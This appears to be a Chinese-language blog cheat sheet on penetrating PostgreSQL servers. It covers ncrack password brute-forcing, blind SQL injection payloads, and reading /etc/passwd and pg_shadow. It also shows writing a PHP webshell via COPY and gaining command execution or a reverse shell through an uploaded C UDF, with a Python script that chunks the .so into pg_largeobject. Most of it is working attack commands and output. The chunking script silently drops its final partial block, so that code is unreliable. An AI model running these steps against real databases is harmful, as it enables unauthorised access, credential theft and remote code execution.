postgresql渗透测试

youncyb 发布于 2019-03-08 4764 次阅读 SQL INJECTION


0.环境安装

1.apt install postgresql 默认将客户端和数据库都装上
2.默认只监听127.0.0.1,需修改监听地址(这会把数据库暴露到网络上,后文的爆破即以此为前提)

//1.修改/etc/postgresql/版本/main/postgresql.conf
# - Connection Settings -

listen_addresses = '*'                  # what IP address(es) to listen on;
                                        # comma-separated list of addresses;
                                        # defaults to 'localhost'; use '*' for all
                                        # (change requires restart)
port = 5432                             # (change requires restart)

//2.修改可连接ip /etc/postgresql/版本/main/pg_hba.conf
# "local" is for Unix domain socket connections only
local   all             all                                     peer
# IPv4 local connections:
host    all             all             192.168.239.1/24            md5
# IPv6 local connections:
host    all             all             ::1/128                 md5

3.修改postgres密码 alter user postgres with password 'password' 或者 \password postgres

1.常用控制台命令

\l          //列出所有数据库
\c 数据库名 //切换到该数据库
\d        //列出当前数据库所有表
\d 表名   //列出表的结构
\du      //列出所有用户及其权限结构
\conninfo //列出当前连接信息

2.ncrack爆破公网上的postgresql

root@we:~/reverse# ncrack -f --user postgres -P /usr/share/wordlists/rockyou.txt psql://192.168.239.157

Starting Ncrack 0.6 ( http://ncrack.org ) at 2019-03-08 10:44 CST

Discovered credentials for psql on 192.168.239.157 5432/tcp:
192.168.239.157 5432/tcp psql: 'postgres' 'postgres'

Ncrack done: 1 service scanned in 3.95 seconds.

Ncrack finished.

3.获取标志信息

推测数据库类型 
################################################################
select version(); // 数据库版本和os版本信息
select '1'||'2';   // || 字符串拼接符类似于concat
select extract(year from now()); //只有在postgresql下不会报错

查看用户,以下四个输出一般情况下一致
################################################################
select user;
select current_user; //和第一个没什么区别,除非set role
select session_user; //当前数据库连接用户
select getpgusername(); //当前线程用户

4.常用函数

ascii(), ord(), encode(str,type), decode(str,type) //这里的decode函数有个大坑,tmd,返回的是bytea,还得用convert_from()转一次
substr(), substring(语句,1,1)
pg_sleep(5); //休眠5秒

只支持 limit x offset x 不支持 limit 0,1

pg_ls_dir('./')  //只能列当前目录及其子目录下的内容,绝对路径不支持
pg_read_file('./xxx') //同上
pg_file_write() // 同上

NULLIF(value1,value2) //可用来进行bool盲注,如果value1和value2相同,则返回NULL,否则返回value1
copy //常用来写文件和读文件,借此可getshell

lo_create(12345) //创建大对象
lo_import('/etc/passwd',12345) //导入大对象,可用来读文件
lo_export(12345,'/tmp/info') //导出大对象,可用来写文件
lo_unlink(12345) //删除大对象

5.枚举数据库

读取用户配置
################################################################
select username,passwd from pg_shadow;

获取所有数据库
################################################################
select datname from pg_database;
select current_database(); // 查看当前数据库

获取所有表
################################################################
select tablename from pg_tables;
select tablename from pg_tables where tablename not like 'pg_%' and tablename not like 'sql_%'; //过滤系统内置表
select table_name from information_schema.tables; //与mysql相似,但模式(schema_name)里面是没有我们建立的表,只有public这种

获取所有列
################################################################
select column_name from information_schema.columns where table_name='xxxx'; //利用上一步得到的表名爆破列名

6.postgresql 盲注

  1. bool盲注
1.NULLIF() 方法
################################################################
test=# select name from user_test where 1=1 and 112=nullif(ascii(substr((select user),1,1)),0);
 name 
------
 yy
(1 row)

2.case when then else 方法
################################################################
test=# select name from user_test where 1=1 and (select case when(select current_database())='test' then true else false end);
 name 
------
 yy
(1 row)

test=# select name from user_test where 1=(select case when(select current_database())='test' then 1 else 0 end);
 name 
------
 yy
(1 row)

2.时间盲注
只有case when then else end 这种方法,具体参考上一点

7.读文件、写文件

1.读文件 copy大法
################################################################
test=# create table t_read(name text);
CREATE TABLE
test=# copy t_read from '/etc/passwd';
COPY 57
test=# select name from t_read;
test=# select name from t_read limit 1 offset 0;
              name               
---------------------------------
 root:x:0:0:root:/root:/bin/bash
(1 row)

2.读文件 lo_import大法
################################################################
select lo_import('/etc/passwd',1);
select array_agg(b)::text::int from(select encode(data,'hex')b,pageno from pg_largeobject where loid=1 order by pageno)a;

3.写文件 copy大法
################################################################
copy((select '<?php phpinfo();?>')) to '/var/www/html/a.php'

//php关键字
copy(select convert_from(decode('c2FkYWQ=','base64'),'UTF-8')) to '/tmp/pgpinfo.php';

4.写文件 lo_export大法
################################################################
test=# select lo_create(1);
 lo_create 
-----------
         1
(1 row)

test=# insert into pg_largeobject values(1,0,'<?php 123');
INSERT 0 1
test=# select lo_export(1,'/tmp/phpinfo.txt');
 lo_export 
-----------
         1
(1 row)

8.命令执行(UDF)

1.低于8.2版本 (未尝试)

CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE C STRICT; 
select system('ls');

2.反弹shell的命令执行

create function exec(cstring) returns int as '/tmp/hack.so','pg_exec' language c strict
select exec('反弹命令');

https://github.com/Dionach/pgexec   //x.x.so文件 eg:9.6.so

3.在没有shell前提下如何上传.so文件?
可通过pg_largeobject将文件写入硬盘上,但文件内容需按2KB切分(pg_largeobject要求每一页不能超过2KB,不足2KB会用0填充)
cat udf.so | xxd -ps | tr -d "\n" > a.txt //将.so文件转换为16进制
借用一下别人的脚本:按2KB分块


#~/usr/bin/env python 2.7
# NOTE(review): the line above is not a valid shebang ("#~" instead of "#!",
# and "python 2.7" is two words). The print statements below are Python 2
# syntax, so run the file explicitly with a Python 2 interpreter.
#-*- coding:utf-8 -*-
# Reads a hex-encoded file (the `xxd -ps | tr -d "\n"` output from the step
# above) and prints one `insert into pg_largeobject` statement per 4096 hex
# characters, i.e. 2048 raw bytes per page. Page numbers (second column)
# start at 0 and increase by one per emitted statement.
import sys
from random import randint
# Random large-object OID chosen once at import time; every statement emitted
# by one run references this same loid.
number = randint(1000, 9999)

if __name__ == "__main__":
    if len(sys.argv) != 2:
        print "Usage:python " + sys.argv[0] + "inputfile"
        sys.exit()
    fileobj = open(sys.argv[1],'rb')
    i = 0    # characters consumed so far
    t = -1   # page number of the last emitted chunk (first chunk is page 0)
    s = ''   # hex characters accumulated for the current chunk
    # Python 2: iterating over read() yields one-character strings.
    for b in fileobj.read():
        i = i + 1
        s += b
        # Only complete 4096-character chunks are printed; whatever remains in
        # `s` when the loop ends is not emitted.
        if i % 4096 == 0:
            t = t + 1
            # The server-side decode(..., 'hex') turns the text back into bytea.
            print 'insert into pg_largeobject values ({number}, {block}, decode(\'{payload}\',\'hex\'));\n'\
                    .format(number=number, block=t, payload=s)
            s = ''
    fileobj.close()

select lo_create(7653); //创建大对象


insert into pg_largeobject values (7653, 0, decode('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','hex'));

insert into pg_largeobject values (7653, 1, decode('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','hex'));

insert into pg_largeobject values (7653, 2, decode('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','hex'));

insert into pg_largeobject values (7653, 3, decode('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','hex'));
select lo_export(7653,'/tmp/xxx.so');
然后就是用上面的方法创建函数、执行命令

9.参考

http://www.jianfensec.com/postgresql_getshell.html
https://paper.tuisec.win/search.jsp?keywords=PostgreSql&&search_by_html=title&&page=1